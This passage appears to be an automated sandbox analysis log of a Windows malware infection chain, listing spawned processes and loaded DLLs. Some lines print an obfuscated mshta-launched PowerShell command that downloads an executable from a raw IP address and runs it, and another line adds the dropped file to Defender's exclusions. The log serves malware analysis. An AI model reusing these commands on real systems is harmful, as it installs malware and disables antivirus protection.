L2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF21.tmp" "c:\Users\user\AppData\Local\Temp\sg2bcrbf\CSC9DC7DEFBB3DB4CF88431EEB79FD9B6EB.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNtJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF21.tmp" "c:\Users\user\AppData\Local\Temp\sg2bcrbf\CSC9DC7DEFBB3DB4CF88431EEB79FD9B6EB.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
